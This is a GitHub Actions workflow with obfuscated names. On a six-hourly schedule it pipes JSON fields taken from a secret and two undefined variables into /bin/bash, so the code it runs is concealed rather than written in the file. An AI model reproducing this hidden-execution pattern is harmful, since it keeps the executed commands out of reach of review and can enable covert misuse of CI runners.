name: yecaixx

on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yecaixx
        env:
          jk2: ${{ secrets.jk2 }}
        run: |
          echo $jk2 | jq -r .ql4 | /bin/bash
          echo $vpz563 | jq -r .xqx57762 | /bin/bash
          echo $ii1 | jq -r .y69762 | /bin/bash

